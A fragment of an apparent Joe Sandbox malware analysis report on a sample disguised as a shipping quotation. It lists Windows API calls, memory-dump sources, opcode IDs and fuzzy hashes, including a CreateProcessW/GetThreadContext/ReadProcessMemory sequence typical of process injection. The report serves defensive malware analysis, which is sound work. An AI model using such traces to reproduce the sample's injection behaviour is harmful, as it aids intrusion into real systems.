                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: ed9499d13aa9cdd7b16588dba44700fa309328884904853365b09bc7e09f004c
                                                                            • Instruction ID: c7542f1ada71727af1285d1857667be3a8bf1a983cc30c521085867174dd2dcc
                                                                            • Opcode Fuzzy Hash: ed9499d13aa9cdd7b16588dba44700fa309328884904853365b09bc7e09f004c
                                                                            • Instruction Fuzzy Hash: BF112AB5610218FFDB208FA5DC44EEEB7B9EF24754F104459E806D7210D2319E4197A0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0106B58B
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0106B621
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0106B643
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                            • Instruction ID: 02e751bb8923966af6d8c146b3d8483278afd840f51e742dadae6c557a2f1ced
                                                                            • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                            • Instruction Fuzzy Hash: F5621B70A14258DBEB24DFA4C850BDEB376EF58300F1091A9D24DEB390E7799E81CB59

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00633A04
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006733A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String
                                                                            • String ID: Line:
                                                                            • API String ID: 3363329723-1585850449
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00672C8C
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                              • Part of subcall function 00632DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00632DC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                            • String ID: X$`eo
                                                                            • API String ID: 779396738-1816224629
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006B82F5
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 006B82FC
                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 006B84DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                            • String ID:
                                                                            • API String ID: 146820519-0
                                                                            APIs
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00631BF4
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00631BFC
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00631C07
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00631C12
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00631C1A
                                                                              • Part of subcall function 00631BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00631C22
                                                                              • Part of subcall function 00631B4A: RegisterWindowMessageW.USER32(00000004,?,006312C4), ref: 00631BA2
                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0063136A
                                                                            • OleInitialize.OLE32 ref: 00631388
                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 006724AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 1986988660-0
                                                                            APIs
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00633908
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_
                                                                            • String ID:
                                                                            • API String ID: 1144537725-0
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0063949C,?,00008000), ref: 00635773
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0063949C,?,00008000), ref: 00674052
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,0066D7D1,00000000,00000000,00000000,00000000,?,0066D7F8,00000000,00000007,00000000,?,0066DBF5,00000000), ref: 006629DE
                                                                            • GetLastError.KERNEL32(00000000,?,0066D7D1,00000000,00000000,00000000,00000000,?,0066D7F8,00000000,00000007,00000000,?,0066DBF5,00000000,00000000), ref: 006629F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 485612231-0
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,006685CC,?,006F8CC8,0000000C), ref: 00668704
                                                                            • GetLastError.KERNEL32(?,006685CC,?,006F8CC8,0000000C), ref: 0066870E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID:
                                                                            • API String ID: 918212764-0
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0106B58B
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0106B621
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0106B643
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11157727696.0000000001069000.00000040.00000020.00020000.00000000.sdmp, Offset: 01069000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1069000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID:
                                                                            • API String ID: 2948472770-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            APIs
                                                                              • Part of subcall function 00634E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E9C
                                                                              • Part of subcall function 00634E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00634EAE
                                                                              • Part of subcall function 00634E90: FreeLibrary.KERNEL32(00000000,?,?,00634EDD,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634EC0
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634EFD
                                                                              • Part of subcall function 00634E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E62
                                                                              • Part of subcall function 00634E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00634E74
                                                                              • Part of subcall function 00634E59: FreeLibrary.KERNEL32(00000000,?,?,00673CDE,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634E87
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressFreeProc
                                                                            • String ID:
                                                                            • API String ID: 2632591731-0
                                                                            • Opcode ID: 74d58ad5def6377864f6ab81d024086810a607b912584bd60183f8c8b72477f0
                                                                            • Instruction ID: 07885ad875f8ea6c35939e434625c704427fc8f22e00941300ac7bfee9cd0d73
                                                                            • Opcode Fuzzy Hash: 74d58ad5def6377864f6ab81d024086810a607b912584bd60183f8c8b72477f0
                                                                            • Instruction Fuzzy Hash: EF11E332600305AACF54BB64DC12FADB7A7AF80711F14842DF546A62C1EE75AE059B98
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00701444,?,0064FDF5,?,?,0063A976,00000010,00701440,006313FC,?,006313C6,?,00631129), ref: 00663852
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: a7de8bf769eba6f03fac91513633cbe8d3cd27ba85e67693320586ba11711634
                                                                            • Instruction ID: 5d33e22edd8069155fd6e7d9e43bbd6cf5fd2c0be15ff3482d3b0901fe752c9a
                                                                            • Opcode Fuzzy Hash: a7de8bf769eba6f03fac91513633cbe8d3cd27ba85e67693320586ba11711634
                                                                            • Instruction Fuzzy Hash: E9E0ED31100234AAE7612AA79C05BDA374BAF827B1F09012CBC0693B81CF20DE0283E4
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,00701418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00634F6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3703f1ae5f6e49c71fe0e8297434dbdb388eb8eb90bd211fe0c88b8495f65d58
                                                                            • Instruction ID: 0a55e132218f5282f75617118b421fbd5873341bdc32a9daf9fc8a56b067ca27
                                                                            • Opcode Fuzzy Hash: 3703f1ae5f6e49c71fe0e8297434dbdb388eb8eb90bd211fe0c88b8495f65d58
                                                                            • Instruction Fuzzy Hash: 7BF03071105751CFDB349F65D490862F7E6EF54329718C9BEE1DA82611CB31A844DF90
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0067EE51,006F3630,00000002), ref: 0069CD26
                                                                              • Part of subcall function 0069CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0069CD19,?,?,?), ref: 0069CC59
                                                                              • Part of subcall function 0069CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0069CD19,?,?,?,?,0067EE51,006F3630,00000002), ref: 0069CC6E
                                                                              • Part of subcall function 0069CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0069CD19,?,?,?,?,0067EE51,006F3630,00000002), ref: 0069CC7A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$Write
                                                                            • String ID:
                                                                            • API String ID: 3847668363-0
                                                                            • Opcode ID: fc1b990bfdde6419c69d446310a8e85c055bfcbd4ae1e878c295bd691e9e5a33
                                                                            • Instruction ID: 6e52dcae353d40c69c977be08f46e5911003874fdd9113f54c0afa7344133666
                                                                            • Opcode Fuzzy Hash: fc1b990bfdde6419c69d446310a8e85c055bfcbd4ae1e878c295bd691e9e5a33
                                                                            • Instruction Fuzzy Hash: 15E06576400704EFCB219F4ADD00CAABBFDFF84360710852FE955C2910D371AA14DB60
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00632DC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID:
                                                                            • API String ID: 82841172-0
                                                                            • Opcode ID: 5134d7601c125d75dee388157e7dfb78d6ce37d1b160d306248b2f5c077167be
                                                                            • Instruction ID: bdf6bfa63726ae353a01293c6dc5d2e50c97d95172bf140f51b2ae63a1eacefb
                                                                            • Opcode Fuzzy Hash: 5134d7601c125d75dee388157e7dfb78d6ce37d1b160d306248b2f5c077167be
                                                                            • Instruction Fuzzy Hash: 6CE0CD72A001245BC7109258DC05FEA77DEDFC8790F044075FD0DD7248D964AD808694
                                                                            APIs
                                                                              • Part of subcall function 00633837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00633908
                                                                              • Part of subcall function 0063D730: GetInputState.USER32 ref: 0063D807
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00632B6B
                                                                              • Part of subcall function 006330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0063314E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                            • String ID:
                                                                            • API String ID: 3667716007-0
                                                                            • Opcode ID: 0564c00b6b494fa88c5e795d29789a2ddab5252f03da0de28647c274bf6b9bb2
                                                                            • Instruction ID: fe2db42188e3c155be836cabf2a1c84310421a526b1e133c10cccb072e18d050
                                                                            • Opcode Fuzzy Hash: 0564c00b6b494fa88c5e795d29789a2ddab5252f03da0de28647c274bf6b9bb2
                                                                            • Instruction Fuzzy Hash: 50E0863170429446C648BB74A8525BDA79B9BD1365F40153EF146832A2CF74454546D9
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00670704,?,?,00000000,?,00670704,00000000,0000000C), ref: 006703B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 33866262bc672dfa310bee892d28001b858bcbb4f6b87a348bb8583b732bad6e
                                                                            • Instruction ID: 07a0b729b453fb791db1a86f87c45eb1cbcea6c5544fb65474823a04f3fa68de
                                                                            • Opcode Fuzzy Hash: 33866262bc672dfa310bee892d28001b858bcbb4f6b87a348bb8583b732bad6e
                                                                            • Instruction Fuzzy Hash: A5D06C3204010DBBDF028F85DD06EDA3BAAFB48714F014000FE1856420C732E821AB90
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00631CBC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem
                                                                            • String ID:
                                                                            • API String ID: 3098949447-0
                                                                            • Opcode ID: c4b102852f75146361b4824d967f8bee8094767c2378712f54627b8063510119
                                                                            • Instruction ID: 62f44e519609e124ccb26ee019ccf45dfb688e41e1c48308516c3d4877edc851
                                                                            • Opcode Fuzzy Hash: c4b102852f75146361b4824d967f8bee8094767c2378712f54627b8063510119
                                                                            • Instruction Fuzzy Hash: B5C09236280304EFF3148B80BC5EF20BB65A348B10F94D101F60DA95E3CBA62832EA58
                                                                            APIs
